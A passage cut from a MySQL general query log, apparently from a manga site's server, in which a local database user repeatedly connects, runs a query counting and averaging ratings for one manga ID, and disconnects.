ratings where manga_id = '106' order by created desc 330650077 Quit 330650078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330650078 Quit 330650079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330650079 Quit 330650080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330650080 Quit 330650081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330650081 Quit 330650082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330650082 Quit 330650083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330650083 Quit 330650084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330650084 Quit 330650085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330650085 Quit 330650086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330650086 Quit 330650087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330650087 Quit 330650088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330650088 Quit 330650089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330650089 Quit 330650090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330650090 Quit 330650091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330650091 Quit 330650092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330650092 Quit 330650093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330650093 Quit 330650094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330650094 Quit 330650095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330650095 Quit 330650096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330650096 Quit 330650097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330650097 Quit 330650098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330650098 Quit 330650099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330650099 Quit 330650100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330650100 Quit 330650101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330650101 Quit 330650102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330650102 Quit 330650103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330650103 Quit 330650104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330650104 Quit 330650105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330650105 Quit 330650106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330650106 Quit 330650107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330650107 Quit 330650108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330650108 Quit 330650109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330650109 Quit 330650110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330650110 Quit 330650111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330650111 Quit 330650112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330650112 Quit 330650113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330650113 Quit 330650114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330650114 Quit 330650115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330650115 Quit 330650116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330650116 Quit 330650117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330650117 Quit 330650118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330650118 Quit 330650119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330650119 Quit 330650120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330650120 Quit 330650121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330650121 Quit 330650122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330650122 Quit 330650123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330650123 Quit 330650124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330650124 Quit 330650125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330650125 Quit 330650126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330650126 Quit 330650127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330650127 Quit 330650128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330650128 Quit 330650129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330650129 Quit 330650130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330650130 Quit 330650131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330650131 Quit 330650132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330650132 Quit 330650133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330650133 Quit 330650134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330650134 Quit 330650135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330650135 Quit 330650136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330650136 Quit 330650137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330650137 Quit 330650138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330650138 Quit 330650139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330650139 Quit 330650140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330650140 Quit 330650141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330650141 Quit 330650142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330650142 Quit 330650143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330650143 Quit 330650144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330650144 Quit 330650145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330650145 Quit 330650146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330650146 Quit 330650147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330650147 Quit 330650148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330650148 Quit 330650149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330650149 Quit 330650150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330650150 Quit 330650151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330650151 Quit 330650152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330650152 Quit 330650153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330650153 Quit 330650154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330650154 Quit 330650155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330650155 Quit 330650156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330650156 Quit 330650157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330650157 Quit 330650158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330650158 Quit 330650159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330650159 Quit 330650160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330650160 Quit 330650161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330650161 Quit 330650162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330650162 Quit 330650163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330650163 Quit 330650164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330650164 Quit 330650165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330650165 Quit 330650166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330650166 Quit 330650167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330650167 Quit 330650168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330650168 Quit 330650169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330650169 Quit 330650170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330650170 Quit 330650171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330650171 Quit 330650172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330650172 Quit 330650173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330650173 Quit 330650174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330650174 Quit 330650175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330650175 Quit 330650176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330650176 Quit 330650177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330650177 Quit 330650178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330650178 Quit 330650179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330650179 Quit 330650180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330650180 Quit 330650181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330650181 Quit 330650182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330650182 Quit 330650183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330650183 Quit 330650184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330650184 Quit 330650185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330650185 Quit 330650186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330650186 Quit 330650187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330650187 Quit 330650188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330650188 Quit 330650189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330650189 Quit 330650190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330650190 Quit 330650191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330650191 Quit 330650192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330650192 Quit 330650193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330650193 Quit 330650194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330650194 Quit 330650195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330650195 Quit 330650196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330650196 Quit 330650197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330650197 Quit 330650198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330650198 Quit 330650199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330650199 Quit 330650200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330650200 Quit 330650201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330650201 Quit 330650202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330650202 Quit 330650203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330650203 Quit 330650204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330650204 Quit 330650205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330650205 Quit 330650206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330650206 Quit 330650207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330650207 Quit 330650208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330650208 Quit 330650209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330650209 Quit 330650210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330650210 Quit 330650211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330650211 Quit 330650212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330650212 Quit 330650213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330650213 Quit 330650214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330650214 Quit 330650215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330650215 Quit 330650216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330650216 Quit 330650217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330650217 Quit 330650218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330650218 Quit 330650219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330650219 Quit 330650220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330650220 Quit 330650221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330650221 Quit 330650222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330650222 Quit 330650223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330650223 Quit 330650224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330650224 Quit 330650225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330650225 Quit 330650226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330650226 Quit 330650227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330650227 Quit 330650228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330650228 Quit 330650229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330650229 Quit 330650230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330650230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where 